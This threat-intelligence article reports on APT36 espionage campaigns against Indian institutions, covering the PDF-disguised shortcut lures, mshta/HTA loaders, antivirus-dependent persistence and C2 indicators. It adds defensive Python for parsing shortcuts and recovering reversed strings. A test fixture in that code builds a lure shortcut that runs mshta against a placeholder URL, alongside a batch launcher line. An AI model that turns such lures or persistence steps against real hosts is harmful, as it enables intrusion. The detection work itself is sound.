Transparent Tribe Initiates New RAT Attacks Targeting Indian Government and Academic Institutions

Cybersecurity researchers have attributed a new wave of targeted cyber espionage activity to the threat group known as Transparent Tribe, also tracked as APT36, aimed at Indian government bodies, academic institutions, and strategically significant organizations.

According to a technical analysis published by CYFIRMA, the campaign relies on deceptive delivery methods, most notably a malicious Windows shortcut (LNK) file that masquerades as a legitimate PDF document. The shortcut embeds authentic PDF content, reducing suspicion while covertly executing malicious code in the background.

Transparent Tribe is a long-running cyber-espionage group believed to operate out of Pakistan and has been active since at least 2013. Over the years it has continuously refined its toolkit, deploying multiple remote access trojans including CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT.

Initial Infection and Execution Flow

The latest attacks begin with spear-phishing emails carrying ZIP archives. Inside the archive is a shortcut file disguised as a PDF. When opened, the LNK runs a remote HTML Application (HTA) via mshta.exe; that script decrypts the final RAT payload and loads it directly into memory, while a decoy PDF is opened at the same time to keep up the appearance of a legitimate document.

CYFIRMA noted that the HTA uses ActiveX objects such as WScript.Shell to interact with the Windows environment, which lets it profile the host and adjust its behaviour at runtime, improving execution reliability across different target systems. For defenders, mshta.exe launched from a shortcut with an http(s) URL on its command line is itself a high-signal event worth alerting on.

Adaptive Persistence Based on Antivirus Detection

A notable feature of the malware is its ability to dynamically adjust its persistence strategy based on the antivirus software installed on the compromised system.

If Kaspersky is detected, the malware creates a directory at C:\Users\Public\core\, writes an obfuscated HTA payload to disk, and establishes persistence through a shortcut placed in the Windows Startup folder that launches the script using mshta.exe.

If Quick Heal is present, persistence is achieved through a batch file and a malicious shortcut in the Startup folder, which executes the HTA payload.

In environments where Avast, AVG, or Avira are detected, the payload is directly copied into the Startup directory and executed.

If no recognized antivirus product is identified, the malware falls back to a default routine that drops the payload, runs a batch file, and establishes registry-based persistence before launching it. Whichever branch runs, the artifacts left behind are a small, fixed set (a Startup folder shortcut or batch file, an HTA on disk, a registry entry), which is what a host sweep should look for.
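The lure shortcut described under the execution flow and the Startup-folder persistence described in this section can be triaged with one small tool. The Python below is an added example written for this page, not CYFIRMA's code or the group's tooling: it parses the MS-SHLLINK StringData fields where a shortcut's launcher and arguments live, flags shortcuts that invoke mshta.exe or another LOLBin, carry a remote URL, or hide their window, and sweeps a Startup-style folder for .lnk, .bat and .hta artifacts. The folder, file names, URL and paths it uses are constructed placeholders, not indicators from the campaign.

```python
"""Added example (not from the CYFIRMA report): parse .lnk files and sweep a
Startup-style folder for the shortcut/batch/HTA persistence described above.
Every path, file name and URL below is a constructed placeholder."""
import os
import re
import struct
import tempfile

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")      # ShellLink class ID
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7   # ShowCommand value that keeps the launched console off-screen
LOLBIN = re.compile(r"\b(mshta|cmd|powershell|wscript|cscript|msiexec|rundll32)(\.exe)?\b", re.I)
REMOTE = re.compile(r"https?://\S+", re.I)
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\.lnk$", re.I)


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand plus the StringData fields (MS-SHLLINK 2.4) of a shortcut.
    LinkTargetIDList and LinkInfo are skipped via their size prefixes."""
    if len(data) < 0x4C or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    info = {"show_command": struct.unpack_from("<I", data, 0x3C)[0]}
    pos = 0x4C
    if flags & HAS_IDLIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    for bit, key in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
                     (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location")):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]      # CountCharacters, not bytes
        raw = data[pos + 2:pos + 2 + count * width]
        pos += 2 + count * width
        info[key] = raw.decode("utf-16-le") if width == 2 else raw.decode("cp1252", "replace")
    return info


def assess_lnk(info: dict) -> list:
    """Reasons a parsed shortcut looks like a lure rather than a user-made link."""
    reasons = []
    launch = " ".join(info.get(k, "") for k in ("relative_path", "arguments"))
    hit = LOLBIN.search(launch)
    if hit:
        reasons.append("launches " + hit.group(1).lower())
    if REMOTE.search(launch):
        reasons.append("remote URL in command line")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("window minimised/hidden")
    return reasons


def sweep_folder(folder: str) -> dict:
    """Map file name -> reasons for each suspicious .lnk or script in a Startup-style folder."""
    hits = {}
    for name in sorted(os.listdir(folder)):
        path = os.path.join(folder, name)
        if not os.path.isfile(path):
            continue
        with open(path, "rb") as fh:
            data = fh.read()
        reasons = []
        if name.lower().endswith(".lnk"):
            try:
                reasons = assess_lnk(parse_lnk(data))
            except ValueError:
                reasons = ["malformed .lnk"]
            if DOUBLE_EXT.search(name):
                reasons.append("document-like double extension")
        elif name.lower().endswith((".bat", ".cmd", ".hta", ".vbs", ".js")):
            reasons = ["script in startup folder"]          # any script here deserves a look
            hit = LOLBIN.search(data.decode("latin-1"))
            if hit:
                reasons.append("script invokes " + hit.group(1).lower())
        if reasons:
            hits[name] = reasons
    return hits


def build_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Assemble a minimal Unicode shortcut (header + RELATIVE_PATH + ARGUMENTS) for testing."""
    header = bytearray(0x4C)
    struct.pack_into("<I16sI", header, 0, 0x4C, LNK_CLSID, HAS_RELPATH | HAS_ARGS | IS_UNICODE)
    struct.pack_into("<I", header, 0x3C, show_command)

    def field(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return bytes(header) + field(relative_path) + field(arguments)


def demo() -> dict:
    """Constructed Startup folder: a PDF-looking lure shortcut, a launcher .bat and a benign link."""
    folder = tempfile.mkdtemp()
    with open(os.path.join(folder, "Advisory.pdf.lnk"), "wb") as fh:
        fh.write(build_lnk(r"..\..\..\Windows\System32\mshta.exe",
                           "http://example.invalid/update.hta", SW_SHOWMINNOACTIVE))
    with open(os.path.join(folder, "update.bat"), "wb") as fh:
        fh.write(b'@echo off\r\nmshta.exe "%PUBLIC%\\core\\payload.hta"\r\n')
    with open(os.path.join(folder, "Notes.lnk"), "wb") as fh:
        fh.write(build_lnk(r"..\Documents\notes.txt", ""))
    return sweep_folder(folder)
```

On a suspect host, point sweep_folder() at each user's Startup folder and at C:\Users\Public\core\. Shortcuts whose target is carried only in the LinkTargetIDList (no relative path or arguments) need an ItemID parser, which this example deliberately skips; the fields it does read are the ones a command line with a URL ends up in.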

Capabilities of the Deployed RAT

The second-stage HTA delivers a malicious DLL named iinneldc.dll, which functions as a full-featured remote access trojan. The RAT supports remote system control, file operations, data exfiltration, screenshot capture, clipboard monitoring, and process manipulation.

CYFIRMA emphasized that Transparent Tribe continues to demonstrate high levels of persistence and strategic focus, particularly in intelligence gathering against Indian government entities and educational institutions.

Related Campaign Using Government Advisory Lures

In recent weeks, the group has also been linked to another campaign leveraging a malicious shortcut file disguised as a government advisory PDF titled NCERT-Whatsapp-Advisory.pdf.lnk. This variant delivers a .NET-based loader that deploys additional executables and DLLs to enable remote command execution, system reconnaissance, and long-term access.

The shortcut executes an obfuscated command via cmd.exe to download an MSI installer named nikmights.msi from aeroclubofindia.co[.]in. The installer performs several actions, including displaying a decoy PDF, writing malicious DLLs to C:\ProgramData\PcDirvs\, executing a dropped binary after a delay, and establishing registry-based persistence through an HTA script.

Interestingly, the decoy document is a legitimate advisory issued by Pakistan’s National Cyber Emergency Response Team (PKCERT) in 2024, warning about fraudulent WhatsApp campaigns targeting government entities.

The malicious wininet.dll communicates with a hard-coded command-and-control server at dns.wmiprovider[.]com, a domain registered in mid-April 2025. Although the C2 infrastructure is currently inactive, the registry-based persistence means the implant will resume beaconing if the domain is brought back online.

The DLL uses several HTTP GET endpoints for registration, heartbeat communication, command execution, and anti-VM checks. To evade detection, the endpoint strings are stored reversed, so a plain strings pass over the binary will not surface them; candidate strings need to be reversed before matching.
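Reversed strings defeat a naive strings-and-grep pass. The Python below is an added example for this page, not code from the report or from the sample: it pulls printable ASCII and UTF-16LE runs from a byte blob, tests each both as-is and mirrored against a URL-path pattern, and reports which transform matched and at what offset. The blob it scans is constructed here and the endpoints in it are placeholders, not indicators from wininet.dll.

```python
"""Added example (not from the CYFIRMA report or the sample): recover HTTP
endpoint strings that a binary stores reversed. SAMPLE_BLOB and every path in
it are constructed placeholders, not indicators from wininet.dll."""
import re

ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")                      # what `strings` would print
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")               # UTF-16LE strings common in Windows binaries
ENDPOINT = re.compile(r"^(?:https?://[\w.-]+)?/[\w./?=&%-]*$")   # "/path" or "http(s)://host/path"


def classify(text: str):
    """("plain", text) if the string is a URL/path as-is, ("reversed", mirror) if only its mirror is, else None."""
    if ENDPOINT.match(text):
        return "plain", text
    if ENDPOINT.match(text[::-1]):
        return "reversed", text[::-1]
    return None


def scan(blob: bytes) -> list:
    """List (offset, encoding, kind, endpoint) for every candidate string, in file order."""
    found = []
    for enc, pattern, codec in (("ascii", ASCII_RUN, "ascii"), ("utf-16", WIDE_RUN, "utf-16-le")):
        for m in pattern.finditer(blob):
            verdict = classify(m.group().decode(codec))
            if verdict:
                found.append((m.start(), enc, verdict[0], verdict[1]))
    return sorted(found)


# Constructed stand-in for a .data section: one forward path, several reversed ones, plus noise.
SAMPLE_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 8
    + b"kernel32.dll\x00"                           # ordinary import name: no hit either way
    + b"retsiger/\x00"                              # "/register" reversed
    + b"taebtraeh/\x00"                             # "/heartbeat" reversed
    + b"=di?dmc/\x00"                               # "/cmd?id=" reversed
    + b"nocaeb/dilavni.elpmaxe.2c//:ptth\x00\x00"   # whole URL reversed, padded so it cannot fuse with the wide run
    + "sutats/".encode("utf-16-le") + b"\x00\x00"   # "/status" reversed, stored as a wide string
    + b"/plain/path\x00"                            # forward string, for contrast
)

if __name__ == "__main__":
    for offset, enc, kind, endpoint in scan(SAMPLE_BLOB):
        print(f"{offset:#06x} {enc:7} {kind:8} {endpoint}")
```

Run scan() over the section dump of a suspect DLL rather than the whole file to keep noise down; any hit tagged "reversed" is a string the author did not want seen in plain form, and its offset gives a starting point for finding the routine that un-reverses it.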


